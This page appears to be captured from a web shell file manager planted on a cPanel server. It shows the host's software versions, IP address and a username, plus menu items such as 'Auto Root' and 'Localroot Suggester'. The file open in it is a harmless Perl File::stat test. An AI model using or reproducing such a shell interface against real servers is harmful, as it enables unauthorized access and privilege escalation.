Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
lib /
File /
Delete
Unzip
Name
Size
Permission
Date
Action
Spec
[ DIR ]
drwxr-xr-x
2016-10-10 17:38
.exists
0
B
-rw-r--r--
2016-10-10 17:39
Basename.pm
10.93
KB
-r--r--r--
2014-12-27 11:48
Basename.t
4.92
KB
-r--r--r--
2014-12-27 11:48
Compare.pm
4.23
KB
-r--r--r--
2014-12-27 11:48
Compare.t
3.86
KB
-r--r--r--
2014-12-27 11:48
Copy.pm
15.35
KB
-r--r--r--
2014-12-27 11:48
Copy.t
15.67
KB
-r--r--r--
2014-12-27 11:49
DosGlob.pm
7.81
KB
-r--r--r--
2014-12-27 11:48
Fetch.pm
45.17
KB
-r--r--r--
2014-12-27 11:48
Find.pm
32.49
KB
-r--r--r--
2014-12-27 11:49
Glob.pm
12.38
KB
-r--r--r--
2014-12-27 11:48
GlobMapper.pm
15.36
KB
-r--r--r--
2014-12-27 11:48
Path.pm
32.41
KB
-r--r--r--
2014-12-27 11:48
Spec.pm
10.25
KB
-r--r--r--
2015-01-10 12:06
Temp.pm
77.09
KB
-r--r--r--
2014-12-27 11:48
stat-7896.t
846
B
-r--r--r--
2014-12-27 11:48
stat.pm
9.84
KB
-r--r--r--
2014-12-27 11:48
stat.t
5.84
KB
-r--r--r--
2014-12-27 11:49
Save
Rename
#!./perl -w use strict; use Test::More; use File::stat; # This is possibly a bit black-box, but for now it works. # If (either) File::stat stops lazy loading Symbol, or Test::More starts, it # should be revisited is($INC{'Symbol.pm'}, undef, "Symbol isn't loaded yet"); # ID 20011110.104 (RT #7896) $! = 0; is($!, '', '$! is empty'); is(File::stat::stat('/notafile'), undef, 'invalid file should fail'); isnt($!, '', 'should populate $!, given invalid file'); my $e = $!; isnt($INC{'Symbol.pm'}, undef, "Symbol has been loaded"); # Repeat twice is(File::stat::stat('/notafile'), undef, 'invalid file should fail again'); is($!, $e, '$! should be consistent for an invalid file'); $e = $!; is(File::stat::stat('/notafile'), undef, 'invalid file should fail again'); is($!, $e, '$! should be consistent for an invalid file'); done_testing();